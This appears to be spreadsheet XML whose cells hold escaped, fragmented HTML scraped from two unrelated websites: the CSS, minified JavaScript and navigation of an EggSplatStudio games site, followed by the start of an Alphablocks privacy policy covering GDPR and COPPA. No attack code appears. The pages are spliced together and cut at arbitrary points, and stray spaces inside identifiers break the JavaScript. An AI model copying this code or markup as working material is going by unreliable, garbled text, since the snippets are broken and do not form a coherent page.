:not(:first-child){margin-top:16px}.x .c1-68{border-color:rgba(76, 76, 76, 0.5)}.x .c1-69{border-bottom-width:0px}.x .c1-6a{border-bottom-style:solid}.x .c1-6b:last-child{border-bottom:0}.x .c1-6c{min-width:200px}.x .c1-6d{justify-content:initial}.x .c1-6e:hover:before{background-color:#EEE}.x .c1-6f:active{color:#EEE}.x .c1-6g:active{font-weight:700}.x .c1-6i{font-weight:700}.x .c1-6j{flex-wrap:wrap}.x .c1-6k{margin-right:-12px}.x .c1-6l{margin-left:-12px}.x .c1-6n{flex-basis:0%}.x .c1-6o{padding-right:12px}.x .c1-6p{padding-left:12px}.x .c1-6t{padding-left:40px}.x .c1-6u{padding-right:40px}.x .c1-6v{min-width:100%}.x .c1-6w{padding-bottom:24px}.x .c1-6y{margin-bottom:16px}.x .c1-6z{flex-basis:100%}.x .c1-73{font-size:inherit ! important}.x .c1-74{line-height:inherit}.x .c1-75{font-style:italic}.x .c1-76{text-decoration:line-through}.x .c1-77{text-decoration:underline}.x .c1-78{right:0px}.x .c1-79{z-index:10000}.x .c1-7a{height:auto}.x .c1-7b{transition:all</t>
  </si>
  <si>
    <t>1s ease-in}.x .c1-7c{box-shadow:0 2px 6px 0px rgba(0,0,0,0.3)}.x .c1-7d{contain:content}.x .c1-7e{bottom:-500px}.x .c1-7f{padding-top:24px}.x .c1-7g{[object -object]:0px}.x .c1-7o{line-height:1.25}.x .c1-7p{padding-bottom:8px}.x .c1-7q{color:rgb(255, 255, 255)}.x .c1-7r{max-height:300px}.x .c1-7s{color:rgb(213, 213, 213)}.x .c1-7u{letter-spacing:2px}.x .c1-7v{border-top-width:1.3px}.x .c1-7w{border-right-width:1.3px}.x .c1-7x{border-bottom-width:1.3px}.x .c1-7y{border-left-width:1.3px}.x .c1-7z{justify-content:center}.x .c1-80{margin-top:24px}.x .c1-81{margin-bottom:4px}.x .c1-82{flex-basis:50%}.x .c1-83{border-style:solid}.x .c1-84{padding-top:4px}.x .c1-85{padding-bottom:4px}.x .c1-86{min-height:40px}.x .c1-87{background-color:transparent}.x .c1-88{border-color:currentColor}.x .c1-89{text-shadow:none}.x .c1-8a:nth-child(2){margin-left:24px}.x .c1-8b:hover{color:rgb(48, 48, 48)}.x .c1-8c:hover{background-color:rgb(255, 255, 255)}.x .c1-8d:hover{border-color:rgb(255, 255, 255)}&lt;/style&gt;
&lt;style data-glamor="cxs-xs-sheet"&gt;@media (max-width: 767px){.x .c1-l{padding-top:40px}}@media (max-width: 767px){.x .c1-m{padding-bottom:40px}}@media (max-width: 767px){.x .c1-1i{width:100%}}@media (max-width: 767px){.x .c1-1j{display:flex}}@media (max-width: 767px){.x .c1-1k{justify-content:center}}@media (max-width: 767px){.x .c1-6x{padding-bottom:32px}}&lt;/style&gt;
&lt;style data-glamor="cxs-sm-sheet"&gt;@media (min-width: 768px){.x .c1-d{font-size:16px}}@media (min-width: 768px) and (max-width: 1023px){.x .c1-1l{width:100%}}@media (min-width: 768px){.x .c1-2a{font-size:22px}}@media (min-width: 768px){.x .c1-2m{font-size:38px}}@media (min-width: 768px){.x .c1-2r{font-size:30px}}@media (min-width: 768px){.x .c1-3z{font-size:12px}}@media (min-width: 768px) and (max-width: 1023px){.x .c1-4l{right:0px}}@media (min-width: 768px){.x .c1-4z{margin-top:0}}@media (min-width: 768px){.x .c1-50{margin-right:-24px}}@media (min-width: 768px){.x .c1-51{margin-bottom:-48px}}@media (min-width: 768px){.x .c1-52{margin-left:-24px}}@media (min-width: 768px){.x .c1-58{padding-top:0}}@media (min-width: 768px){.x .c1-59{padding-right:24px}}@media (min-width: 768px){.x .c1-5a{padding-bottom:48px}}@media (min-width: 768px){.x .c1-5b{padding-left:24px}}@media (min-width: 768px){.x .c1-62{width:100%}}@media (min-width: 768px){.x .c1-6m{margin-bottom:0}}@media (min-width: 768px){.x .c1-6q{padding-bottom:0}}@media (min-width: 768px){.x .c1-7h{width:400px}}@media (min-width: 768px){.x .c1-7i{max-height:500px}}@media (min-width: 768px){.x .c1-7j{border-radius:7px}}@media (min-width: 768px){.x .c1-7k{margin-top:24px}}@media (min-width: 768px){.x .c1-7l{margin-right:24px}}@media (min-width: 768px){.x .c1-7m{margin-bottom:24px}}@media (min-width: 768px){.x .c1-7n{margin-left:24px}}@media (min-width: 768px){.x .c1-7t{max-height:140px}}@media (min-width: 768px){.x .c1-8e{width:auto}}&lt;/style&gt;
&lt;style data-glamor="cxs-md-sheet"&gt;@media (min-width: 1024px){.x .c1-e{font-size:16px}}@media (min-width: 1024px){.x .c1-o{display:block}}@media (min-width: 1024px){.x .c1-10{padding-top:0px}}@media (min-width: 1024px){.x .c1-11{padding-bottom:0px}}@media (min-width: 1024px){.x .c1-12{margin-bottom:0px}}@media (min-width: 1024px){.x .c1-13{display:flex}}@media (min-width: 1024px){.x .c1-14{flex-direction:column}}@media (min-width: 1024px){.x .c1-2b{font-size:22px}}@media (min-width: 1024px){.x .c1-2n{font-size:38px}}@media (min-width: 1024px){.x .c1-2s{font-size:30px}}@media (min-width: 1024px){.x .c1-40{font-size:12px}}@media (min-width: 1024px) and (max-width: 1279px){.x .c1-4k{right:0px}}@media (min-width: 1024px){.x .c1-4r{display:none}}@media (min-width: 1024px){.x .c1-63{width:984px}}@media (min-width: 1024px){.x .c1-6h{min-width:initial}}@media (min-width: 1024px){.x .c1-6r{flex-basis:125%}}@media (min-width: 1024px){.x .c1-6s{max-width:125%}}@media (min-width: 1024px){.x .c1-70{flex-basis:0%}}@media (min-width: 1024px){.x .c1-71{max-width:none}}@media (min-width: 1024px){.x .c1-72{text-align:center}}&lt;/style&gt;
&lt;style data-glamor="cxs-lg-sheet"&gt;@media (min-width: 1280px){.x .c1-f{font-size:16px}}@media (min-width: 1280px){.x .c1-2c{font-size:22px}}@media (min-width: 1280px){.x .c1-2o{font-size:44px}}@media (min-width: 1280px){.x .c1-2t{font-size:32px}}@media (min-width: 1280px){.x .c1-41{font-size:12px}}@media (min-width: 1280px){.x .c1-64{width:1160px}}&lt;/style&gt;
&lt;style data-glamor="cxs-xl-sheet"&gt;@media (min-width: 1536px){.x .c1-g{font-size:18px}}@media (min-width: 1536px){.x .c1-2d{font-size:24px}}@media (min-width: 1536px){.x .c1-2p{font-size:48px}}@media (min-width: 1536px){.x .c1-2u{font-size:36px}}@media (min-width: 1536px){.x .c1-42{font-size:14px}}@media (min-width: 1536px){.x .c1-65{width:1280px}}&lt;/style&gt;
&lt;style&gt;.page-inner { background-color: rgb(51, 51, 51); min-height: 100vh; }&lt;/style&gt;
&lt;script&gt;!function(e){var n={};function t(o){if(n[o])return n[o].exports;var i=n[o]={i:o,l:!1,exports:{}};return e[o].call(i.exports,i,i.exports,t),i.l=!0,i.exports}t.m=e,t.c=n,t.d=function(e,n,o){t.o(e,n)||Object.defineProperty(e,n,{enumerable:!0,get:o})},t.r=function(e){"undefined"!=typeof Symbol&amp;&amp;Symbol.toStringTag&amp;&amp;Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},t.t=function(e,n){if(1&amp;n&amp;&amp;(e=t(e)),8&amp;n)return e;if(4&amp;n&amp;&amp;"object"==typeof e&amp;&amp;e&amp;&amp;e.__esModule)return e;var o=Object.create(null);if(t.r(o),Object.defineProperty(o,"default",{enumerable:!0,value:e}),2&amp;n&amp;&amp;"string"!=typeof e)for(var i in e)t.d(o,i,function(n){return e[n]}.bind(null,i));return o},t.n=function(e){var n=e&amp;&amp;e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,n){return Object.prototype.hasOwnProperty.call(e,n)},t.p="",t(t.s=0)}([function(e,n,t){e.exports=t(1)},function(e,n,t){"use strict";window.guacImage=t(2),window.guacDefer=t(3),window.onVisualComplete=t(4),window.markVisuallyComplete=t(5),window.deferBootstrap=t(6),window.onAllowCookieTracking=t(7)},function(e,n,t){"use strict";function o(e,n,t,o){const c=(t=t||{}).delay||500,s=t.cellSize||{x:20,y:20};let u,d,a,w,l,f,p,g=!0;const h=function(e){const o='url("'+e+'")';let i=o;if(t.backgroundLayers&amp;&amp;t.backgroundLayers.constructor===Array){const e=t.backgroundLayers.map((function(e){return e.replace(/{width}/g,a.w).replace(/{height}/g,a.h)}));i=[].concat(e,[o]).join(", ")}n.style.backgroundImage=i,setTimeout((function(){n.style.opacity=1}),300)}.bind(this),b=function(){g&amp;&amp;(o?o(d,a):t.useTreatmentData?h(d):n.style.backgroundImage='url("'+d+'")',t.shouldMarkVisuallyComplete&amp;&amp;window&amp;&amp;window.markVisuallyComplete(),n.setAttribute("data-guac-image","loaded"))}.bind(this),v=function(){const e=document.createElement("img");e.src=d,e.complete||!e.addEventListener?b():e.addEventListener("load",b)}.bind(this),m=function(){if(!g)return;n.setAttribute("data-guac-image","loading"),u=null;const t=i(n,s);return t?(a||(a=t),t.w!==a.w||t.h!==a.h?(a=t,l(1)):(d=r(e,t,s),void(d!==w?(w=d,!p&amp;&amp;window. IntersectionObserver?(p</t>
  </si>
  <si>
    <t>VISUAL_COMPLETE?void e():(window._vctListeners=window._vctListeners||[],void window._vctListeners.push(e))}},function(e,n,t){"use strict";e.exports=function(){window.vctElements--,window.VISUAL_COMPLETE||window.vctElements||(window. VISUAL_COMPLETE=window.performance.now(),window._trfd&amp;&amp;window._trfd.push({vct:window. VISUAL_COMPLETE}),window._vctListeners&amp;&amp;window._vctListeners.forEach((function(e){e()})))}},function(e,n,t){"use strict";const o=new Set,i={},r="undefined"!=typeof window&amp;&amp;new window.IntersectionObserver((e,n)=&gt;{e.forEach(e=&gt;{const{target:t,isIntersecting:o}=e;o&amp;&amp;(window.</t>
  </si>
  <si>
    <t>Core.utils.renderBootstrap(i[t.id]),delete i[t.id],n.unobserve(t))})});e.exports=function(e,n=!1){const{radpack:t,elId:c}=e;t&amp;&amp;n&amp;&amp;window.radpack.getDeps(t).then(e=&gt;{e.forEach(e=&gt;{if(!o.has(e)){const n=document.createElement("link");n.rel="prefetch",n.href=e,n.as="script",n.crossOrigin="Anonymous",document.head.appendChild(n),o.add(e)}})}),i[c]=e,r.observe(document.getElementById(c))}},function(e,n,t){"use strict";e.exports=function(e){return window._allowCT?void e():(window._allowCTListener=window._allowCTListener||[],void window._allowCTListener.push(e))}}]);
"use strict";
if ('serviceWorker' in navigator) {
  window.addEventListener('load', function () {
    navigator.serviceWorker.register('/sw.js');
  });
}&lt;/script&gt;&lt;/head&gt;
&lt;body class="x  x-fonts-muli" context="[object Object]"&gt;&lt;div id="layout-5-fe-83927-82-f-5-4-e-57-aac-6-460-bcff-5-b-1-cf" class="layout layout-layout layout-layout-layout-24 locale-en-US lang-en"&gt;&lt;div data-ux="Page" id="page-85821" class="x-el x-el-div x-el c1-1 c1-2 c1-3 c1-4 c1-5 c1-6 c1-7 c1-8 c1-9 c1-a c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"&gt;&lt;div data-ux="Block" class="x-el x-el-div page-inner c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"&gt;&lt;div id="decb563d-2ffd-496b-8f45-a72d6081dd25" class="widget widget-header widget-header-header-9"&gt;&lt;div data-ux="Header" role="main" data-aid="HEADER_WIDGET" id="n-85822" class="x-el x-el-div x-el x-el c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-h c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"&gt;&lt;div&gt; &lt;section data-ux="Section" data-aid="HEADER_SECTION" class="x-el x-el-section c1-1 c1-2 c1-h c1-i c1-j c1-k c1-b c1-c c1-l c1-m c1-d c1-e c1-f c1-g"&gt;&lt;div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-n c1-b c1-c c1-d c1-o c1-e c1-f c1-g"&gt;&lt;/div&gt;&lt;div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"&gt;&lt;/div&gt;&lt;div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"&gt;&lt;nav data-ux="SectionContainer" class="x-el x-el-nav c1-1 c1-2 c1-p c1-q c1-r c1-s c1-t c1-u c1-v c1-w c1-x c1-y c1-z c1-b c1-c c1-d c1-10 c1-11 c1-12 c1-e c1-f c1-g"&gt;&lt;div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-n c1-b c1-c c1-d c1-13 c1-14 c1-e c1-f c1-g"&gt;&lt;div data-ux="Block" id="nav-85827" class="x-el x-el-div c1-1 c1-2 c1-15 c1-16 c1-17 c1-18 c1-19 c1-b c1-c c1-d c1-e c1-f c1-g"&gt;&lt;div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-1a c1-1b c1-1c c1-x c1-y c1-1d c1-1e c1-b c1-c c1-d c1-e c1-f c1-g"&gt;&lt;div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-4 c1-15 c1-1f c1-1a c1-b c1-c c1-d c1-e c1-f c1-g"&gt;&lt;div data-ux="Block" data-aid="HEADER_LOGO_RENDERED" class="x-el x-el-div c1-1g c1-1h c1-t c1-1a c1-c c1-1i c1-1j c1-1k c1-1l c1-d c1-e c1-f c1-g"&gt;&lt;a rel="" role="link" aria-haspopup="menu" data-ux="Link" data-page="e4a29574-7367-47ba-a97a-6afa99d5677a" title="EggSplatStudio" href="/" data-typography="LinkAlpha" class="x-el x-el-a c1-1m c1-1n c1-1o c1-1p c1-1q c1-1r c1-1s c1-1t c1-1u c1-1v c1-1w c1-t c1-4 c1-b c1-1x c1-c c1-1y c1-1z c1-20 c1-d c1-e c1-f c1-g" data-tccl="ux2.HEADER.header9.Logo. Default. Link.</t>
  </si>
  <si>
    <t>Default.85828.click,click"&gt;&lt;div data-ux="Block" id="logo-container-85829" class="x-el x-el-div c1-1 c1-2 c1-1g c1-4 c1-u c1-b c1-c c1-d c1-e c1-f c1-g"&gt;&lt;h3 role="heading" aria-level="3" data-ux="LogoHeading" id="logo-text-85830" data-aid="HEADER_LOGO_TEXT_RENDERED" data-typography="LogoAlpha" class="x-el x-el-h3 c1-21 c1-22 c1-1p c1-1q c1-23 c1-24 c1-25 c1-26 c1-z c1-t c1-1g c1-b c1-27 c1-28 c1-29 c1-2a c1-2b c1-2c c1-2d"&gt;EggSplatStudio&lt;/h3&gt;&lt;span role="heading" aria-level="NaN" data-ux="scaler" data-size="xxlarge" data-scaler-id="scaler-logo-container-85829" aria-hidden="true" data-typography="LogoAlpha" class="x-el x-el-span c1-21 c1-22 c1-2e c1-2f c1-23 c1-24 c1-25 c1-26 c1-z c1-t c1-n c1-2g c1-2h c1-2i c1-2j c1-2k c1-2l c1-b c1-27 c1-29 c1-2m c1-2n c1-2o c1-2p"&gt;EggSplatStudio&lt;/span&gt;&lt;span role="heading" aria-level="NaN" data-ux="scaler" data-size="xlarge" data-scaler-id="scaler-logo-container-85829" aria-hidden="true" data-typography="LogoAlpha" class="x-el x-el-span c1-21 c1-22 c1-2e c1-2f c1-23 c1-24 c1-25 c1-26 c1-z c1-t c1-n c1-2g c1-2h c1-2i c1-2j c1-2k c1-2q c1-b c1-27 c1-29 c1-2r c1-2s c1-2t c1-2u"&gt;EggSplatStudio&lt;/span&gt;&lt;span role="heading" aria-level="NaN" data-ux="scaler" data-size="large" data-scaler-id="scaler-logo-container-85829" aria-hidden="true" data-typography="LogoAlpha" class="x-el x-el-span c1-21 c1-22 c1-2e c1-2f c1-23 c1-24 c1-25 c1-26 c1-z c1-t c1-n c1-2g c1-2h c1-2i c1-2j c1-2k c1-28 c1-b c1-27 c1-29 c1-2a c1-2b c1-2c c1-2d"&gt;EggSplatStudio&lt;/span&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-2v c1-15 c1-2w c1-17 c1-x c1-y c1-2x c1-2y c1-b c1-c c1-d c1-e c1-f c1-g"&gt;&lt;nav data-ux="Nav" data-aid="HEADER_NAV_RENDERED" role="navigation" class="x-el x-el-nav c1-1 c1-2 c1-t c1-2z c1-b c1-c c1-d c1-e c1-f c1-g"&gt;&lt;ul data-ux="List" id="nav-85831" class="x-el x-el-ul c1-1 c1-2 c1-26 c1-z c1-24 c1-25 c1-30 c1-31 c1-32 c1-u c1-33 c1-34 c1-35 c1-36 c1-b c1-c c1-d c1-e c1-f c1-g"&gt;&lt;li data-ux="ListItemInline" class="x-el x-el-li nav-item c1-1 c1-2 c1-37 c1-24 c1-38 c1-1g c1-39 c1-3a c1-3b c1-3c c1-u c1-2g c1-b c1-c c1-3d c1-3e c1-d c1-e c1-f c1-g"&gt;&lt;a rel="" role="link" aria-haspopup="menu" data-ux="NavLink" target="" data-page="e4a29574-7367-47ba-a97a-6afa99d5677a" data-edit-interactive="true" aria-labelledby="nav-85831" href="/" data-typography="NavAlpha" class="x-el x-el-a c1-3f c1-22 c1-1o c1-1p c1-1q c1-15 c1-1s c1-17 c1-3g c1-3h c1-3i c1-3j c1-3k c1-3l c1-3m c1-3n c1-b c1-27 c1-3o c1-29 c1-3p c1-3q c1-3r c1-3s c1-3t c1-3u c1-3v c1-3w c1-3x c1-1z c1-3y c1-3z c1-40 c1-41 c1-42" data-tccl="ux2.HEADER.header9.Nav.Default. Link. Default.85833.click,click"&gt;Home&lt;/a&gt;&lt;/li&gt;&lt;li data-ux="ListItemInline" class="x-el x-el-li nav-item c1-1 c1-2 c1-37 c1-24 c1-38 c1-1g c1-39 c1-3a c1-3b c1-3c c1-u c1-2g c1-b c1-c c1-3d c1-3e c1-d c1-e c1-f c1-g"&gt;&lt;a rel="" role="link" aria-haspopup="false" data-ux="NavLink" target="" data-page="bf33365c-56da-4408-89dc-2f558622c09c" data-edit-interactive="true" aria-labelledby="nav-85831" href="/steam" data-typography="NavAlpha" class="x-el x-el-a c1-3f c1-22 c1-1o c1-1p c1-1q c1-15 c1-1s c1-17 c1-3g c1-3h c1-3i c1-3j c1-3k c1-3l c1-3m c1-3n c1-b c1-27 c1-3o c1-29 c1-3p c1-3q c1-3r c1-3s c1-3t c1-3u c1-3v c1-3w c1-3x c1-1z c1-3y c1-3z c1-40 c1-41 c1-42" data-tccl="ux2.HEADER.header9.Nav.</t>
  </si>
  <si>
    <t>Default. Link. Default.85834.click,click"&gt;STEAM&lt;/a&gt;&lt;/li&gt;&lt;li data-ux="ListItemInline" class="x-el x-el-li nav-item c1-1 c1-2 c1-37 c1-24 c1-38 c1-1g c1-39 c1-3a c1-3b c1-3c c1-u c1-2g c1-b c1-c c1-3d c1-3e c1-d c1-e c1-f c1-g"&gt;&lt;a rel="" role="link" aria-haspopup="false" data-ux="NavLink" target="" data-page="ec256b43-e26b-488d-81ae-0f0168ef6510" data-edit-interactive="true" aria-labelledby="nav-85831" href="/mobile-games" data-typography="NavAlpha" class="x-el x-el-a c1-3f c1-22 c1-1o c1-1p c1-1q c1-15 c1-1s c1-17 c1-3g c1-3h c1-3i c1-3j c1-3k c1-3l c1-3m c1-3n c1-b c1-27 c1-3o c1-29 c1-3p c1-3q c1-3r c1-3s c1-3t c1-3u c1-3v c1-3w c1-3x c1-1z c1-3y c1-3z c1-40 c1-41 c1-42" data-tccl="ux2.HEADER.header9.Nav.</t>
  </si>
  <si>
    <t>Default. Link. Default.85835.click,click"&gt;Mobile Games&lt;/a&gt;&lt;/li&gt;&lt;li data-ux="ListItemInline" class="x-el x-el-li nav-item c1-1 c1-2 c1-37 c1-24 c1-38 c1-1g c1-39 c1-3a c1-3b c1-3c c1-u c1-2g c1-b c1-c c1-3d c1-3e c1-d c1-e c1-f c1-g"&gt;&lt;a rel="" role="link" aria-haspopup="false" data-ux="NavLinkActive" target="" data-page="eb61586e-9ca9-4bf9-8ee0-18cb9e0c8553" data-edit-interactive="true" aria-labelledby="nav-85831" href="/privacy" data-typography="NavAlpha" class="x-el x-el-a c1-3f c1-22 c1-1o c1-1p c1-1q c1-15 c1-1s c1-17 c1-b c1-27 c1-3o c1-29 c1-3p c1-3q c1-3r c1-3s c1-3t c1-43 c1-3v c1-3w c1-4</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;!-- Last Published: Wed Apr 12 2023 16:05:00 GMT+0000 (Coordinated Universal Time) --&gt;&lt;html data-wf-domain="www.learningblocks.tv" data-wf-page="62684ef1a49c63e093f3c0c0" data-wf-site="5ebbbacd07f0f10257ac30d9" lang="en"&gt;&lt;head&gt;&lt;meta charset="utf-8"/&gt;&lt;title&gt;Privacy Policy&lt;/title&gt;&lt;meta content="Find out more about Alphablocks and Numberblocks" name="description"/&gt;&lt;meta content="Privacy Policy" property="og:title"/&gt;&lt;meta content="Find out more about Alphablocks and Numberblocks" property="og:description"/&gt;&lt;meta content="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/6319f2747fd260771bcdd542_Open%20Graph-min%20(1).png" property="og:image"/&gt;&lt;meta content="Privacy Policy" property="twitter:title"/&gt;&lt;meta content="Find out more about Alphablocks and Numberblocks" property="twitter:description"/&gt;&lt;meta content="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/6319f2747fd260771bcdd542_Open%20Graph-min%20(1).png" property="twitter:image"/&gt;&lt;meta property="og:type" content="website"/&gt;&lt;meta content="summary_large_image" name="twitter:card"/&gt;&lt;meta content="width=device-width, initial-scale=1" name="viewport"/&gt;&lt;link href="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/css/blocks-website.webflow.ce5bd007c.css" rel="stylesheet" type="text/css"/&gt;&lt;link href="https://fonts.googleapis.com" rel="preconnect"/&gt;&lt;link href="https://fonts.gstatic.com" rel="preconnect" crossorigin="anonymous"/&gt;&lt;script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"&gt;&lt;/script&gt;&lt;script type="text/javascript"&gt;WebFont.load({  google: {    families: ["Ubuntu:300,300italic,400,400italic,500,500italic,700,700italic","Montserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic","Roboto:300,regular,500,700,900","Nanum Gothic:regular,800:korean,latin","Quicksand:regular,700"]  }});&lt;/script&gt;&lt;!--[if lt IE 9]&gt;&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js" type="text/javascript"&gt;&lt;/script&gt;&lt;![endif]--&gt;&lt;script type="text/javascript"&gt;!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o. DocumentTouch&amp;&amp;c instanceof DocumentTouch)&amp;&amp;(n.className+=t+"touch")}(window,document);&lt;/script&gt;&lt;link href="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/6306249e4ca8147ab4ce6cc6_Favicon.png" rel="shortcut icon" type="image/x-icon"/&gt;&lt;link href="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/6306254bdaec4640323d4960_Webclip.png" rel="apple-touch-icon"/&gt;&lt;meta name="p:domain_verify" content="835e270de45b908c93f9078c726b8546"/&gt;
&lt;meta name="facebook-domain-verification" content="gfct2chc7049dqlfzjxh8leiqhhncf" /&gt;
&lt;script&gt;UPLOADCARE_PUBLIC_KEY = 'b088fd72c70b5d997e5c';&lt;/script&gt;
&lt;script src="https://ucarecdn.com/libs/widget/3.x/uploadcare.full.min.js" data-integration="Webflow"&gt;&lt;/script&gt;
&lt;script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"&gt;&lt;/script&gt;
&lt;script id="mcjs"&gt;!function(c,h,i,m,p){m=c.createElement(h),p=c.getElementsByTagName(h)[0],m.async=1,m.src=i,p.parentNode.insertBefore(m,p)}(document,"script","https://chimpstatic.com/mcjs-connected/js/users/b7a4c12084897feb467dbd5e7/a31a5416de36e8fc21d49cb79.js");&lt;/script&gt;&lt;/head&gt;&lt;body&gt;&lt;div class="section ab wf-section"&gt;&lt;div class="wrapper"&gt;&lt;div class="row pp"&gt;&lt;div class="privacy-logo-wrapper"&gt;&lt;a href="/numberblocks/home" class="pp-logo w-inline-block"&gt;&lt;img src="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/630789b8be4d78764673cf32_NB_logo_BBC_B-min.png" srcset="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/630789b8be4d78764673cf32_NB_logo_BBC_B-min-p-500.png 500w, https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/630789b8be4d78764673cf32_NB_logo_BBC_B-min.png 700w" sizes="(max-width: 767px) 23vw, (max-width: 991px) 19vw, 14vw" alt="Numberblocks BBC B"/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="privacy-logo-wrapper"&gt;&lt;a href="/alphablocks/home" class="pp-logo w-inline-block"&gt;&lt;img src="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/630789b724f2ba016193186c_AB_logo_BBC_B-min.png" srcset="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/630789b724f2ba016193186c_AB_logo_BBC_B-min-p-500.png 500w, https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/630789b724f2ba016193186c_AB_logo_BBC_B-min.png 700w" sizes="(max-width: 767px)</t>
  </si>
  <si>
    <t>23vw, (max-width: 991px) 19vw, 14vw" alt="Alphablocks BBC B"/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="privacy-logo-wrapper"&gt;&lt;a href="/alphablocks/home" class="pp-logo w-inline-block"&gt;&lt;img src="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/630789b7d164707a135d7f58_CB_logo_BBC_B-min.png" srcset="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/630789b7d164707a135d7f58_CB_logo_BBC_B-min-p-500.png 500w, https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/630789b7d164707a135d7f58_CB_logo_BBC_B-min.png 700w" sizes="(max-width: 767px) 23vw, (max-width: 991px)</t>
  </si>
  <si>
    <t>19vw, 14vw" alt="Colourblocks BBC B"/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="row pp"&gt;&lt;div class="policy-wrapper"&gt;&lt;div href="" class="w-richtext"&gt;&lt;h2&gt;Website privacy policy (GDPR and DPA 2020 compliant)  - Alphablocks&lt;/h2&gt;&lt;p&gt;‍&lt;/p&gt;&lt;h4&gt;Introduction&lt;/h4&gt;&lt;p&gt;Welcome to the Alphablocks Limited&amp;#x27;s (collectively referred to as &amp;quot;Alphablocks&amp;quot;, &amp;quot;we&amp;quot;, &amp;quot;us&amp;quot; or &amp;quot;our&amp;quot;) privacy policy ( “Privacy Policy”). &lt;/p&gt;&lt;p&gt;Alphablocks respects your privacy and is committed to protecting your personal data.</t>
  </si>
  <si>
    <t>This Privacy Policy will inform you as to how we look after your personal data when you visit our website (regardless of where you visit it from) and tell you about your privacy rights and how the law protects you. &lt;/p&gt;&lt;p&gt; This Privacy Policy is provided in a layered format so you can click through to the specific areas set out below.</t>
  </si>
  <si>
    <t>Please also use the Glossary to understand the meaning of some of the terms used in this Privacy Policy.&lt;/p&gt;&lt;p&gt;‍&lt;/p&gt;&lt;h4&gt;Important information and who we are&lt;/h4&gt;&lt;p&gt;This Privacy Policy aims to give you information on how Alphablocks collects and processes your personal data through your use of this website, including any data you may provide through this website when you sign up to our newsletter &lt;strong&gt;OR&lt;/strong&gt; purchase a product or service &lt;strong&gt;OR&lt;/strong&gt; take part in a competition. While this website is intended for use by children, we do not knowingly collect data relating to children.&lt;/p&gt;&lt;p&gt; It is important that you read this Privacy Policy together with any other privacy policy or fair processing policy we may provide on specific occasions when we are collecting or processing personal data about you so that you are fully aware of how and why we are using your data.</t>
  </si>
  <si>
    <t xml:space="preserve">This Privacy Policy supplements other notices and privacy policies and is not intended to override them. &lt;/p&gt;&lt;p&gt;‍&lt;/p&gt;&lt;h4&gt;&lt;strong&gt;Children&amp;#x27;s Online Privacy Protection Act&lt;/strong&gt; (“COPPA”)&lt;/h4&gt;&lt;p&gt;In compliance with the COPPA guidelines, we:&lt;/p&gt;&lt;p&gt;·       Limit the personal information collected only to what is necessary to allow for you to participate in the website activity.&lt;/p&gt;&lt;p&gt;·        For the purposes of COPPA, “personal information” includes:&lt;/p&gt;&lt;p&gt;o   screen or user names that function in the same way as an email address or other online contact information;&lt;/p&gt;&lt;p&gt;o   geolocation information that can identify a street name and town or city name;&lt;/p&gt;&lt;p&gt;o   a persistent identifier that can track a user over time and across different websites or online services such as a customer ID stored in a cookie, an IP address, or a unique device identifier; and&lt;/p&gt;&lt;p&gt;o   a photograph, video, or audio file that contains a child&amp;#x27;s image or voice.&lt;/p&gt;&lt;p&gt;·       </t>
  </si>
  <si>
    <t xml:space="preserve">As part of our compliance with COPPA, this Privacy Policy sets out the personal information (if any) collected from children, how we intend to use the information and share it with others, and what rights parents have regarding the information.&lt;/p&gt;&lt;p&gt;·        We will notify parents directly in order to obtain &amp;quot;verifiable parental consent&amp;quot; before collecting, using, or disclosing personal information from children, unless the collection falls under one of the limited exceptions, such as responding to a child&amp;#x27;s one-time request.&lt;/p&gt;&lt;p&gt;·        We will also honour a parents’ request to:&lt;/p&gt;&lt;p&gt;o   review the personal information collected about their child;&lt;/p&gt;&lt;p&gt;o   revoke their consent for further collection and use of their child&amp;#x27;s information; and&lt;/p&gt;&lt;p&gt;o   delete their child&amp;#x27;s 